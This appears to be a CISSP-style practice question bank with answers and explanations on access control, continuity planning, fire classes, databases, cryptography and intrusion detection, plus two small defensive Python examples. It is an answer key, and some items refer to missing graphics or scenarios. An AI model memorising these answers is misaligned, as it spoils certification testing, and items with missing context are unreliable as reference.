Which of the following refers to the assessment of a system by someone with full knowledge of how it was designed or implemented? A. White box testing. B. Gray box testing. C. Black box testing. D. Blue box testing.

A. White box testing.

What could be the most significant result of a flaw in file or directory permission settings? A. A privileged service could be installed by an attacker, yielding system-level control. B. Important files could be maliciously deleted or overwritten by an attacker. C. Sensitive files could be read, bypassing access controls. D. Errors in file or directory permission settings don't tend to be very critical, because only an attacker with local access can exploit them.

A. A privileged service could be installed by an attacker, yielding system-level control.

Which of the following best describes the type of technology the team should implement to increase the work effort of buffer overflow attacks? A. Address space layout randomization. B. Memory induction application. C. Input memory isolation. D. Read-only memory integrity checks.

A. Address space layout randomization.

Business continuity plans are required for: A. All areas of the enterprise. B. Financial resources and information processing. C. Operating areas of the enterprise. D. Marketing, finance, and information processing.

A. All areas of the enterprise.

Alice, Bob, and many of their colleagues have spent months constructing a business continuity plan (BCP) for their enterprise. What is the first test of their plan that should be conducted? A. Checklist test. B. Structured walk-through test. C. Simulation test. D. Parallel test.

A. Checklist test.

There are five different classes of fire. Each depends upon what is on fire. Which of the following is the proper mapping for the items missing in the provided table?
Fire class | Type of fire | Elements of fire | Suppression method
Class A | ? | ? | Water, soda acid
Class B | ? | ? | CO2, FM-200
Class C | ? | ? | Gas (Halon) or CO2, nonconductive extinguishing agent
Class D | ? | ? | Dry chemicals
Class K | ? | ? | Wet chemical
A. Class D -- combustible metals B. Class C -- liquid C. Class B -- electrical D. Class A -- electrical.

A. Class D -- combustible metals.

What type of operating parameter can an administrator set that would lock out a user after too many failed attempts at login? A. Clipping level. B. Password checker. C. Account expiry. D. Password history.

A. Clipping level.

Tom is setting up computers at a trade show for his company's booth. The computers will give customers the opportunity to access a new product but will also take them onto a live network. Which control would be the best fit to offer necessary protection from public users gaining privileged access? A. Constrained user interface. B. Role-based. C. Discretionary-based. D. Network segregation.

A. Constrained user interface.

______ is a discipline that outlines how the proper design of a physical environment can reduce crime by directly affecting human behavior. A. Crime prevention through environmental design. B. Security prevention through environmental design. C. Crime prevention through security design. D. Crime prevention through environmental development.

A. Crime prevention through environmental design.

Mike is the new CSO of a large pharmaceutical company. He has been asked to revamp the company's physical security program and better align it with the company's information security practices. Mike knows that the new physical security program should be made up of controls and processes that support the following categories: deterrent, delaying, detection, assessment, and response. Mike's team has decided to implement new perimeter fences and warning signs against trespassing around the company's facility. Which of the categories listed in the scenario do these countermeasures map to? A. Deterrent B. Delaying C. Detection D. Assessment

A. Deterrent.

If an operating system allows sequential use of an object without refreshing it, what security issue can arise? A. Disclosure of residual data B. Unauthorized access to privileged processes C. Data leakage through covert channels D. Compromise of the execution domain

A. Disclosure of residual data.

Extranets, VANs, and shared networks with external entities create what legal concern? A. Downstream liability B. Increased SLAs C. Human resource issues D. Network configuration complexity

A. Downstream liability.

Security awareness training programs have all of the following characteristics, except: A. Enforced by department heads. B. Simple, clear, and concise. C. Ongoing. D. Entertaining and positive.

A. Enforced by department heads.

What is the rationale behind classifying and labeling data? A. Ensuring data is protected in the most cost-effective manner B. Ensuring data is not modified without proper authority C. Ensuring data is not accessed without proper authority D. Ensuring data is protected as rigorously as possible

A. Ensuring data is protected in the most cost-effective manner.

Which of the following best describes a continuity of operations plan? A. Establishes senior management and headquarters after a disaster; outlines roles and authorities, orders of succession, and individual role tasks. B. Plan for systems, networks, and major applications recovery procedures after disruptions. A contingency plan should be developed for each major system and application. C. Includes internal and external communications structure and roles, identifies specific individuals who will communicate with external entities, and contains pre-developed statements that are to be released. D. Focuses on malware, hackers, intrusions, attacks, and other security issues. Outlines procedures for incident response.

A. Establishes senior management and headquarters after a disaster; outlines roles and authorities, orders of succession, and individual role tasks.

A node that sends and receives at the same time can perform what type of transmission? A. Full-duplex B. Half-duplex C. Unicast D. Multi-duplex

A. Full-duplex.

If an employee is suspected of wrongdoing in a computer crime, what department must be involved? A. Human resources. B. Legal. C. Auditors. D. Payroll.

A. Human resources.

Which of the following has/have an incorrect definition? i. Foreign key: an attribute of one table that is related to the cell of another table. ii. Cell: an intersection of a row and column. iii. Schema: defines the structure of the database. iv. Data dictionary: central repository of data elements and their relationships. A. i B. i, ii, iii C. i, ii, iv D. i, ii, iii, iv

A. i

Database software performs three main types of integrity services: semantic, referential, and entity. Which of the following correctly describe these services? i. A semantic integrity mechanism makes sure structural and semantic rules are enforced. ii. A database has referential integrity if all foreign keys reference existing primary keys. iii. Entity integrity guarantees that the tuples are uniquely identified by primary key values. A. i, ii, iii B. ii, iii C. i, ii D. i

A. i, ii, iii

When selecting an offsite storage facility and vendor, which of the following criteria should be considered? i. Geographic area. ii. Accessibility. iii. Security. iv. Environment. v. Cost. A. i, ii, iii, iv, v B. i, ii, iii C. i, iii, v D. ii, iii, iv

A. i, ii, iii, iv, v

Which of the following would be considered restrictions of a hierarchical database structure? i. To be able to access a certain data entity within a hierarchical database requires the knowledge of which branch to start with and which route to take through each layer until the data is reached. ii. To be able to access a certain key entity within a hierarchical database requires the knowledge of which branch to start with and which route to take through each layer until the data is reached. iii. It does not use indexes as relational databases do for searching procedures. iv. It does use indexes as relational databases do for searching procedures. A. i, iii B. i, ii, iii C. ii, iii, iv D. i, ii

A. i, iii

Which of the following is true of a good service level agreement (SLA)? A. It can provide a service consumer access to review the provider's security audit reports. B. It allows an organization to outsource the responsibility for data storage and protection. C. It ensures the guaranteed level of service delivery for a provider. D. It can decrease the burden of an organization's regulatory compliance.

A. It can provide a service consumer access to review the provider's security audit reports.

What is an advantage of RSA over DSA? A. It can provide digital signature and encryption functionality. B. It uses fewer resources and encrypts quicker because it uses symmetric keys. C. It is a block cipher versus a stream cipher. D. It employs a one-time encryption pad.

A. It can provide digital signature and encryption functionality.

Which of the following best describes key derivation functions (KDFs)? A. Keys are generated from a master key. B. Session keys are generated from each other. C. Asymmetric cryptography is used to encrypt symmetric keys. D. A master key is generated from a session key.

A. Keys are generated from a master key.

How can logging play a role in stopping security breaches in a system? A. Logging is the activity of collecting information that will be used for monitoring and auditing to enable early detection of security problems. B. Logging is the cataloging of performance issues to fight intruders. C. Logging plays a very minimal role in system security; it is used more as a housekeeping measure than as a factor in an effective security policy. D. Logging is the process of identifying user errors and not security breaches.

A. Logging is the activity of collecting information that will be used for monitoring and auditing to enable early detection of security problems.

Which matches the following definition: "the use of needles to remove the outer protective material on the card's circuits by using ultrasonic vibration. Once this is completed, data can be accessed and manipulated by directly tapping into the card's ROM chips"? A. Microprobing. B. Differential power analysis. C. Electromagnetic analysis. D. Software attacks.

A. Microprobing.

Part of the collection and identification stage of the evidence life cycle is marking or labeling evidence. Which statement is not true regarding marking evidence? A. Never mark on the original evidence. B. Seal evidence in an envelope. C. When sealing evidence, write on the tape that seals it shut. D. Include initials, date, and case number on your mark.

A. Never mark on the original evidence.

When crafting a technical security report for management, how long should the executive summary be, and what should it contain? A. No more than a page or two, highlighting only what senior leaders need to understand about the contents, which could run to hundreds of pages. B. No more than five pages, highlighting only what senior leaders need to understand about the contents, which could run to hundreds of pages. C. No more than a page or two, highlighting the most important technical details. D. No more than five pages, highlighting the most important technical details.

A. No more than a page or two, highlighting only what senior leaders need to understand about the contents, which could run to hundreds of pages.

An autonomous system is controlled by how many entities? A. One B. Two C. Three D. More than 10

A. One.

Which are the proper steps of developing a disaster recovery and continuity plan? A. project initiation, strategy development, business impact analysis, plan development, implementation, testing, and maintenance. B. Strategy development, project initiation, business impact analysis, plan development, implementation, testing, and maintenance. C. Implementation and testing, project initiation, strategy development, business impact analysis, and plan development. D. Plan development, project initiation, strategy development, business impact analysis, implementation, testing, and maintenance.

A. project initiation, strategy development, business impact analysis, plan development, implementation, testing, and maintenance.

One advantage of prototyping is that: A. Prototype systems can save significant time and costs. B. Change control is often less complicated with prototype systems. C. Prototypes ensure that functions or extras are not added to the intended system. D. Strong internal controls are easier to implement with prototypes.

A. Prototype systems can save significant time and costs.

When protecting information assets, which of the following security controls is most effective for data at rest? A. Requiring whole-disk encryption for all devices with the Advanced Encryption Standard (AES). B. Implementing encryption with Transport Layer Security or IPsec. C. Implementing whole-memory encryption with the storage keys in CPU registers. D. Requiring the use of next-generation firewalls (NGFWs) and/or network-based intrusion prevention systems (NIPS).

A. Requiring whole-disk encryption for all devices with the Advanced Encryption Standard (AES).

A process is suspended and waiting for an available time slot on the CPU or waiting for an event to occur. What is this known as? A. Sleep state. B. Run state. C. Masked/interruptible state. D. Wait state.

A. Sleep state.

Which of the following is not considered a passive attack? A. Spoofing. B. Network sniffing. C. Wiretapping. D. Traffic analysis.

A. Spoofing.

A coffee company has created a new and unique way to package its product. Which of the following should it pursue? A. Trademark. B. Patent. C. Copyright. D. NDA.

A. Trademark.

An OLTP database ensuring that no transactions are finalized until all connected systems have synchronized is employing what function? A. Two-phase commit. B. Query processing. C. Isolation. D. Redundancy/checksum.

A. Two-phase commit.

Single sign-on systems have a main strength and a main weakness. Choose the best answer exposing this strength and weakness. A. Users do not need to remember multiple passwords, but access to many systems can be obtained by cracking only one password, making it less secure. B. They allow the user to make use of very simple passwords; it puts undue burden on IT to administer the system. C. They force the user to make use of stronger passwords; it makes it easier for users but encourages little attention to security policies. D. They remove the burden of remembering multiple passwords from users; users need to type the same password when confronted with authentication requests for different resources.

A. Users do not need to remember multiple passwords, but access to many systems can be obtained by cracking only one password, making it less secure.

When should a Class C fire extinguisher be used instead of a Class A? A. When electrical equipment is on fire. B. When fuel is on fire. C. When paper or wood is on fire. D. When a metal such as magnesium is on fire.

A. When electrical equipment is on fire.

Most operating systems and applications allow administrators to configure the data that will be captured in audit logs for security purposes. Which of the following is the least important item to be captured in audit logs? A. System performance output data. B. Last user who accessed the device. C. Number of unsuccessful access attempts. D. Number of successful access attempts.

A. System performance output data.

An application is downloaded from the Internet to perform disk cleanup and to delete unnecessary temporary files. The application is also recording network login data and sending it to another party. This application is best described as which of the following? A. A virus B. A Trojan horse C. A worm D. A logic bomb

B. A Trojan horse looks like an innocent and helpful program, but in the background it is carrying out some type of malicious activity unknown to the user. The Trojan horse could be corrupting files, sending the user's password to an attacker, or attacking another computer.

Which of the following is the best way to reduce brute-force attacks that allow intruders to uncover users' passwords? A. Increase the clipping level. B. Lock out an account for a certain amount of time after the clipping level is reached. C. After a threshold of failed login attempts is met, the administrator must physically lock out the account. D. Choose a weaker algorithm that encrypts the password file.

B. A brute-force attack is an attack that continually tries different inputs to achieve a predefined goal, which can then be used to obtain credentials for unauthorized access. A brute-force attack to uncover passwords means that the intruder is attempting all possible sequences of characters to uncover the correct password. If the account would be disabled (or locked out) after this type of attack attempt took place, this would prove to be a good countermeasure.

What technology within identity management is illustrated in the graphic that follows? A. User provisioning B. Federated identity C. Directories D. Web access management

B. A federated identity is a portable identity and its associated entitlements that can be used across business boundaries. It allows a user to be authenticated across multiple IT systems and enterprises. Identity federation is based upon linking a user's otherwise distinct identities at two or more locations without the need to synchronize or consolidate directory information. Federated identity offers businesses and consumers a more convenient way of accessing distributed resources and is a key component of e-commerce.

Which of the following correctly describes a federated identity and its role within identity management processes? A. A nonportable identity that can be used across business boundaries B. A portable identity that can be used across business boundaries C. An identity that can be used within intranet virtual directories and identity stores D. An identity specified by domain names that can be used across business boundaries

B. A federated identity is a portable identity and its associated entitlements that can be used across business boundaries. It allows a user to be authenticated across multiple IT systems and enterprises. Identity federation is based upon linking a user's otherwise distinct identities at two or more locations without the need to synchronize or consolidate directory information. Federated identity offers businesses and consumers a more convenient way of accessing distributed resources and is a key component of e-commerce.

Information security is a field that is maturing and becoming more organized and standardized. Organizational security models should be based upon a formal architecture framework. Which of the following best describes what a formal architecture framework is and why it would be used? A. Mathematical model that defines the secure states that various software components can enter and still provide the necessary protection B. Conceptual model that is organized into multiple views addressing each of the stakeholder's concerns C. Business enterprise framework that is broken down into six conceptual levels to ensure security is deployed and managed in a controllable manner D. Enterprise framework that allows for proper security governance

B. A formal architecture framework is a conceptual model in which an architecture description is organized into multiple architecture views, where each view addresses specific concerns originating with the specific stakeholders. Individual stakeholders have a variety of system concerns, which the architecture must address. To express these concerns, each view applies the conventions of its architecture viewpoint.

What is the name of a water sprinkler system that keeps pipes empty and doesn't release water until a certain temperature is met and a "delay mechanism" is instituted? A. Wet B. Preaction C. Delayed D. Dry

B. A link must melt before the water will pass through the sprinkler heads, which creates the delay in water release. This type of suppression system is best in data-processing environments because it allows time to deactivate the system if there is a false alarm.

Use the following scenario to answer Questions 22-24. Tom is a new security manager for a retail company, which currently has an identity management system (IdM) in place. The data within the various identity stores updates more quickly than the current IdM software can keep up with, so some access decisions are made based upon obsolete information. While the IdM currently provides centralized access control of internal network assets, it is not tied into the web-based access control components that are embedded within the company's partner portals. Tom also notices that help-desk technicians are spending too much time resetting passwords for internal employees. Which of the following changes would be best for Tom's team to implement? A. Move from namespaces to distinguished names. B. Move from meta-directories to virtual directories. C. Move from RADIUS to TACACS+. D. Move from a centralized to a decentralized control model.

B. A meta-directory within an IdM physically contains the identity information within an identity store. It allows identity information to be pulled from various locations and be stored in one local system (identity store). The data within the identity store is updated through a replication process, which may take place weekly, daily, or hourly depending upon configuration. Virtual directories use pointers to where the identity data resides on the original system; thus, no replication processes are necessary. Virtual directories usually provide the most up-to-date identity information since they point to the original source of the data.

A number of attacks can be performed against smart cards. Side-channel is a class of attacks that doesn't try to compromise a flaw or weakness. Which of the following is NOT a side-channel attack? A. Differential power analysis B. Microprobing analysis C. Timing analysis D. Electromagnetic analysis

B. A noninvasive attack is one in which the attacker watches how something works and how it reacts in different situations instead of trying to "invade" it with more intrusive measures. Examples of side-channel attacks are fault generation, differential power analysis, electromagnetic analysis, timing, and software attacks. These types of attacks are used to uncover sensitive information about how a component works without trying to compromise any type of flaw or weakness. A more intrusive smart card attack is microprobing. Microprobing uses needles and ultrasonic vibration to remove the outer protective material on the card's circuits. Once this is complete, data can be accessed and manipulated by directly tapping into the card's ROM chips.

There are different types of fire suppression systems. Which of the following answers best describes the difference between a deluge and a preaction system? A. A deluge system provides a delaying mechanism that allows someone to deactivate the system in case of a false alarm or if the fire can be extinguished by other means. A preaction system provides similar functionality but has wide open sprinkler heads that allow a lot of water to be dispersed quickly. B. A preaction system provides a delaying mechanism that allows someone to deactivate the system in case of a false alarm or if the fire can be extinguished by other means. A deluge system has wide open sprinkler heads that allow a lot of water to be dispersed quickly. C. A dry pipe system provides a delaying mechanism that allows someone to deactivate the system in case of a false alarm or if the fire can be extinguished by other means. A deluge system has wide open sprinkler heads that allow a lot of water to be dispersed quickly. D. A preaction system provides a delaying mechanism that allows someone to deactivate the system in case of a false alarm or if the fire can be extinguished by other means. A deluge system provides similar functionality but has wide open sprinkler heads that allow a lot of water to be dispersed quickly.

B. A preaction system has a link that must be burned through before water is released. This is the mechanism that provides the delay in water release. A deluge system has wide open sprinkler heads that allow a lot of water to be released quickly. It does not have a delaying component.

Use the following scenario to answer Questions 33-35. Harry is overseeing a team that has to integrate various business services provided by different company departments into one web portal for both internal employees and external partners. His company has a diverse and heterogeneous environment with different types of systems providing customer relationship management, inventory control, e-mail, and help-desk ticketing capabilities. His team needs to allow different users access to these different services in a secure manner. Which of the following best describes the type of environment Harry's team needs to set up? A. RADIUS B. Service-oriented architecture C. Public key infrastructure D. Web services

B. A service-oriented architecture (SOA) will allow Harry's team to create a centralized web portal and offer the various services needed by internal and external entities.

Which of the following is most likely the issue that Grace's team experienced when their systems went offline? A. Three critical systems were connected to a dual-attached station. B. Three critical systems were connected to a single-attached station. C. The secondary FDDI ring was overwhelmed with traffic and dropped the three critical systems. D. The FDDI ring is shared in a metropolitan environment and only allows each company to have a certain number of systems connected to both rings.

B. A single-attachment station (SAS) is attached to only one ring (the primary) through a concentrator. If the primary goes down, it is not connected to the backup secondary ring. A dual-attachment station (DAS) has two ports, and each port provides a connection for both the primary and the secondary rings.

What is a code review? A. Making sure coders work in parallel to watch each others' work while they are coding B. Making sure coders' work has been reviewed by other coders after they are done C. Making sure that the appropriate Q/A harnesses have been applied prior to check in D. Making sure that appropriate Q/A harnesses exist

B. A static code review requires that at least one other set of eyes inspects the code before it is deployed, in order to search for flaws that may not have been obvious to the author but may be apparent to another engineer. In science we call it peer review.

There are several types of intrusion detection systems (IDSs). What type of IDS builds a profile of an environment's normal activities and assigns an anomaly score to packets based on the profile? A. State-based B. Statistical anomaly-based C. Misuse-detection system D. Protocol signature-based

B. A statistical anomaly-based IDS is a behavioral-based system. Behavioral-based IDS products do not use predefined signatures, but rather are put in a learning mode to build a profile of an environment's "normal" activities. This profile is built by continually sampling the environment's activities. The longer the IDS is put in a learning mode, in most instances, the more accurate a profile it will build and the better protection it will provide. After this profile is built, all future traffic and activities are compared to it. With the use of complex statistical algorithms, the IDS looks for anomalies in the network traffic or user activity. Each packet is given an anomaly score, which indicates its degree of irregularity. If the score is higher than the established threshold of "normal" behavior, then the preconfigured action will take place.
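
An added illustration of the profile-then-score loop described above (example code written for this page, not from the original source): a small statistical anomaly scorer learns a mean and standard deviation per packet feature from a "learning mode" sample, then sums absolute z-scores for new packets and fires when the score crosses a threshold. The baseline and the observed packets are constructed values, not captured traffic, and the threshold of 6.0 is an arbitrary assumption for the demo.

```python
from statistics import mean, pstdev

# Features observed per packet: (payload length in bytes, inter-arrival time in ms).
FEATURES = ("length", "interval_ms")

# Constructed "learning mode" sample of normal traffic (not a real capture).
BASELINE = [
    (480, 90), (500, 100), (520, 110), (540, 120), (460, 80),
    (500, 100), (510, 105), (490, 95), (470, 85), (530, 115),
]

def build_profile(samples):
    """Learning mode: record mean and standard deviation of every feature.

    The longer the sampling window, the closer this gets to the environment's
    real 'normal'; here it is a ten-packet toy profile."""
    profile = {}
    for i, name in enumerate(FEATURES):
        values = [s[i] for s in samples]
        sd = pstdev(values)
        # guard against a constant feature (sd == 0) dividing by zero later
        profile[name] = (mean(values), sd if sd > 0 else 1.0)
    return profile

def anomaly_score(profile, packet):
    """Sum of absolute z-scores: how many standard deviations each feature
    sits from the learned mean. Higher means more irregular."""
    score = 0.0
    for i, name in enumerate(FEATURES):
        mu, sd = profile[name]
        score += abs(packet[i] - mu) / sd
    return score

def flag_packets(profile, packets, threshold):
    """True for every packet whose score exceeds the threshold, i.e. where the
    preconfigured action (alert, drop, ...) would fire."""
    return [anomaly_score(profile, p) > threshold for p in packets]

# Constructed test traffic: one normal packet, one flood-style burst of large
# packets arriving 2 ms apart, one tiny probe arriving 1 ms apart.
OBSERVED = [(510, 102), (1500, 2), (64, 1)]

if __name__ == "__main__":
    profile = build_profile(BASELINE)
    for pkt, flagged in zip(OBSERVED, flag_packets(profile, OBSERVED, threshold=6.0)):
        print(pkt, round(anomaly_score(profile, pkt), 1), "ANOMALY" if flagged else "normal")
```

The threshold is the tuning knob the answer refers to: set it too low and ordinary variance (a slightly larger page, a slow link) raises false alarms; set it too high and a low-and-slow probe that stays near the learned mean never scores above it.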

Which of the following best describes why Sean's team wants to put in the mentioned countermeasure for the most commonly attacked systems? A. Prevent production system hijacking B. Reduce DoS attack effects C. Gather statistics during the process of an attack D. Increase forensic capabilities

B. A tarpit is commonly a piece of software configured to emulate a vulnerable, running service. Once the attackers start to send packets to this "service," the connection to the victim system seems to be live and ongoing, but the response from the victim system is slow and the connection may time out. Most attacks and scanning activities take place through automated tools that require quick responses from their victim systems. If the victim systems do not reply or are very slow to reply, the automated tools may not be successful because the protocol connection times out. This can reduce the effects of a DoS attack.

What is the difference between a test and an assessment? A. An assessment is a comparison between the properties of a system and some predetermined standardized configuration. A test is a series of related assessments. B. A test is a comparison between the properties of a system and some predetermined standardized configuration. An assessment is a series of related tests. C. An assessment is a systematic test to determine a system's satisfaction of some external standard authored by a third party. D. A test is a systematic assessment to determine a system's satisfaction of some external standard authored by a third party.

B. A test is an examination of the properties or behaviors of a particular system compared to a baseline established by the enterprise to satisfy the approved security posture for the system or device. An assessment is a series of such tests across a deployment of related devices or systems, performed to determine the general security posture of an entire functional area.

Several different tunneling protocols can be used in dial-up situations. Which of the following would be best to use as a VPN tunneling solution? A. L2F B. PPTP C. IPSec D. L2TP

B. A virtual private network (VPN) is a secure, private connection through a public network or an otherwise unsecure environment. It is a private connection because encryption and tunneling protocols are used to ensure the confidentiality and integrity of the data in transit. It is important to remember that VPN technology requires a tunnel to work, and it assumes encryption. The protocols that can be used for VPNs are Point-to-Point Tunneling Protocol (PPTP), Internet Protocol Security (IPSec), and Layer 2 Tunneling Protocol (L2TP). PPTP, a Microsoft protocol, allows remote users to set up a PPP connection to a local ISP and then create a secure VPN to their destination. PPTP was the de facto industry-standard tunneling protocol for years, but the new de facto standard for VPNs is IPSec. PPTP is designed for client/server connectivity and establishes a single point-to-point connection between two computers. It works at the data link layer and transmits only over IP networks.

The confidentiality of sensitive data is protected in different ways depending on the state of the data. Which of the following is the best approach to protecting data in transit? A. SSL B. VPN C. IEEE 802.1x D. Whole-disk encryption

B. A virtual private network (VPN) provides confidentiality for data being exchanged between two endpoints. While the use of VPNs may not be sufficient in every case, it is the only answer among those provided that addresses the question. The use of Secure Sockets Layer (SSL) is not considered secure. IEEE 802.1x is an authentication protocol that does not protect data in transit. Finally, whole-disk encryption may be a good approach to protecting sensitive data, but only while it is at rest.

Jane is suspicious that an employee is sending sensitive data to one of the company's competitors. The employee has to use this data for daily activities, thus it is difficult to properly restrict the employee's access rights. In this scenario, which best describes the company's vulnerability, threat, risk, and necessary control? A. Vulnerability is employee access rights, threat is internal entities misusing privileged access, risk is the business impact of data loss, and the necessary control is detailed network traffic monitoring. B. Vulnerability is lenient access rights, threat is internal entities misusing privileged access, risk is the business impact of data loss, and the necessary control is detailed user monitoring. C. Vulnerability is employee access rights, threat is internal employees misusing privileged access, risk is the business impact of confidentiality, and the necessary control is multifactor authentication. D. Vulnerability is employee access rights, threat is internal users misusing privileged access, risk is the business impact of confidentiality, and the necessary control is CCTV.

B. A vulnerability is a lack or weakness of a control. In this situation the access control may be weak in nature, thus exploitable. The vulnerability is that the user, who must be given access to the sensitive data, is not properly monitored to deter and detect a willful breach of security. The threat is that any internal entity might misuse given access. The risk is the business impact of losing sensitive data. One control that could be put into place is monitoring so that access activities can be closely watched.

Here is a graphic of a business continuity policy. Which component is missing from this graphic? A. Damage assessment phase B. Reconstitution phase C. Business resumption phase D. Continuity of operations plan

B. After a disaster takes place and a company moves out of its facility, it must move back in after the facility is reconstructed. When it is time for the company to move back into its original site or a new site, the company is ready to enter into the reconstitution phase. A company is not out of an emergency state until it is back in operation at the original primary site or a new site that was constructed to replace the primary site, because the company is always vulnerable while operating in a backup facility. Many logistical issues need to be considered as to when a company must return from the alternate site to the original site, including: ensuring the safety of employees; ensuring an adequate environment is provided (power, facility infrastructure, water, HVAC); ensuring that the necessary equipment and supplies are present and in working order; ensuring proper communications and connectivity methods are working; and properly testing the new environment.

Bob is a new security administrator at a financial institution. The organization has experienced some suspicious activity on one of the critical servers that contain customer data. When reviewing how the systems are administered, he uncovers some concerning issues pertaining to remote administration. Which of the following should not be put into place to reduce these concerns? i. Commands and data should not be sent in cleartext. ii. SSH should be used, not Telnet. iii. Truly critical systems should be administered locally instead of remotely. iv. Only a small number of administrators should be able to carry out remote functionality. v. Strong authentication should be in place for any administration activities. A. i, ii B. None of them C. ii, iv D. All of them

B. All of these countermeasures should be put into place for proper remote administration activities.

How is a challenge/response protocol utilized with token device implementations? A. This protocol is not used; cryptography is used. B. An authentication service generates a challenge, and the smart token generates a response based on the challenge. C. The token challenges the user for a username and password. D. The token challenges the user's password against a database of stored credentials.

B. An asynchronous token device is based on challenge/response mechanisms. The authentication service sends the user a challenge value, which the user enters into the token. The token encrypts or hashes this value, and the user uses this as her one-time password.
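
The asynchronous (challenge/response) token flow, as an added example that is not part of the original material. Both sides are shown: the authentication service issues a random one-time challenge, the token computes an HMAC over it with a secret shared at enrollment, and the service checks the answer in constant time and refuses a replayed answer. The shared secret, the 8-digit HOTP-style truncation and the AuthService class are this example's assumptions, not any vendor's design.

```python
import hashlib
import hmac
import os

# Constructed per-token secret, provisioned into the token at enrollment.
# Real tokens keep it in tamper-resistant storage; here it is a fixed test value.
TOKEN_SECRETS = {"alice": bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")}

def token_response(secret, challenge, digits=8):
    """What the token computes: HMAC-SHA256 over the typed-in challenge,
    truncated to a short decimal code the user can read off the display
    (the same dynamic-truncation trick HOTP uses)."""
    mac = hmac.new(secret, challenge.encode("ascii"), hashlib.sha256).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"

class AuthService:
    """Server side of the exchange: issues challenges, verifies responses."""

    def __init__(self, secrets):
        self.secrets = secrets
        self.pending = {}  # user -> outstanding challenge, single use

    def issue_challenge(self, user):
        challenge = os.urandom(6).hex()  # 12 hex digits, fresh per login attempt
        self.pending[user] = challenge
        return challenge

    def verify(self, user, response):
        challenge = self.pending.pop(user, None)  # consumed: a replay finds nothing
        if challenge is None or user not in self.secrets:
            return False
        expected = token_response(self.secrets[user], challenge)
        return hmac.compare_digest(expected, response)  # constant-time compare

def run_exchange():
    """One login: legitimate response, then a replay of it, then an attacker
    without the secret answering a fresh challenge. Returns the three verdicts."""
    service = AuthService(TOKEN_SECRETS)

    challenge = service.issue_challenge("alice")
    otp = token_response(TOKEN_SECRETS["alice"], challenge)  # user keys challenge into token
    first = service.verify("alice", otp)

    replay = service.verify("alice", otp)  # same code again: challenge already consumed

    challenge2 = service.issue_challenge("alice")
    forged = token_response(b"not-the-real-secret", challenge2)
    impostor = service.verify("alice", forged)
    return first, replay, impostor

if __name__ == "__main__":
    print(run_exchange())  # (True, False, False)
```

The one-time password is bound to the challenge rather than to a clock or counter, which is why the token is called asynchronous: nothing on the token has to stay in step with the server, but the server must never accept the same challenge twice.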

Which of the following is not a characteristic of an electrostatic intrusion detection system? A. It creates an electrostatic field and monitors for a capacitance change. B. It can be used as an intrusion detection system for large areas. C. It produces a balance between the electric capacitance and inductance of an object. D. It can detect if an intruder comes within a certain range of an object.

B. An electrostatic IDS creates an electrostatic field, which is just an electric field associated with static electric charges. The IDS creates a balanced electrostatic field between itself and the object being monitored. If an intruder comes within a certain range of the monitored object, there is capacitance change. The IDS can detect this change and sound an alarm.

John is reviewing database products. He needs a product that can manipulate a standard set of data for his company's business logic needs. Which of the following should the necessary product implement? A. Relational database B. Object-relational database C. Network database D. Dynamic-static

B. An object-relational database (ORD) or object-relational database management system (ORDBMS) is a relational database with a software front end that is written in an object-oriented programming language. Different companies will have different business logic that needs to be carried out on the stored data. Allowing programmers to develop this front-end software piece allows the business logic procedures to be used by requesting applications and the data within the database.

Nancy is a new network administrator and has been faced with the decision of implementing either direct access backup systems or sequential access backup storage devices. Which of the following does not properly describe these types of technologies? A. Any point on a Direct Access Storage Device may be promptly reached, whereas every point in between the current position and the desired position of a sequential access storage device must be traversed in order to reach the desired position. B. Any point of a sequential access storage device may be promptly reached, whereas every point in between the current position and the desired position of a direct access storage device must be traversed in order to reach the desired position. C. Some tape drives have minimal amounts of direct access intelligence built in. D. Tape drives are sequential storage devices.

B. Any point of a sequential access storage device may be promptly reached, whereas every point in between the current position and the desired position of a direct access storage device must be traversed in order to reach the desired position.

Why is it important to preserve the integrity of system logs, and what is the best way to achieve this goal? A. File system instabilities and other software flaws can result in missing or inaccurate audit trails of critical events if the integrity of system logs is not preserved. The best way to preserve integrity is to employ watchdog processes to ensure that the services producing the logs never fail to do so. B. Attackers will attempt to hide their actions by altering the logs of their activities. The best way to preserve the integrity of the logs and prevent alteration is to log all critical system activities to a remote log aggregator in real time. C. File system instabilities and other software flaws can result in missing or inaccurate audit trails of critical events if the integrity of system logs is not preserved. The best way to preserve integrity is to export logs to a remote system on an hourly basis. D. Attackers will attempt to hide their actions by altering the logs of their activities. The best way to preserve the integrity of the logs and prevent alteration is to create cryptographic hashes of them as they are produced and recorded on the local system.

B. Attackers will attempt to hide their actions by altering the logs of their activities. The best way to preserve the integrity of the logs and prevent alteration is to log all critical system activities to a remote log aggregator in real time. A hash kept on the same host (option D) can be recomputed by an attacker who already controls that host, and an hourly export (option C) leaves a window in which the local copy can be edited before it is shipped.

What should management consider the most when classifying data? A. The type of employees, contractors, and customers who will be accessing the data B. Availability, integrity, and confidentiality C. Assessing the risk level and disabling countermeasures D. The access controls that will be protecting the data

B. Availability, integrity, and confidentiality

Windows and most Linux and Unix systems are based on the DAC model. Which of the following is not true pertaining to the permissions that can be granted? A. Read allows a user to read, but make no changes. B. Change allows a user to read and write only. C. Full control allows a user to read, write, execute, and delete only. D. Change will not allow a non-data owner to modify the object's ACLs

B. Change allows a user to read and write only.

Which class of fire can involve petroleum products and coolants? A. Class A. B. Class B. C. Class C. D. Class D.

B. Class B.

___________ provides for availability and scalability. It groups physically different systems and combines them logically, which helps to provide immunity to faults and improves performance. A. Disc duping B.Clustering C. RAID D. Virtualization

B. Clustering is a fault-tolerant server technology that is similar to redundant servers, except each server takes part in processing services that are requested. A server cluster is a group of servers that are viewed logically as one server to users and can be managed as a single logical system. Clustering provides for availability and scalability. It groups physically different systems and combines them logically, which helps to provide immunity to faults and improves performance. Clusters work as an intelligent unit to balance traffic, and users who access the cluster do not know they may be accessing different systems at different times. To the users, all servers within the cluster are seen as one unit.

All of the following are best practices for controlling the software that is installed and authorized to run in our systems except A. Application whitelisting B. Code reviews C. Gold Masters D. Least privilege

B. Code reviews are focused on finding and fixing defects in software that is undergoing development. They are not helpful in controlling which applications run on our computers.

What does management need to consider the most when classifying data? A. Type of employees, contractors, and customers who will be accessing the data. B. Confidentiality, integrity, and availability. C. First assess the risk level and implement the correct countermeasures. D. The access controls that will be protecting the data.

B. Confidentiality, integrity, and availability.

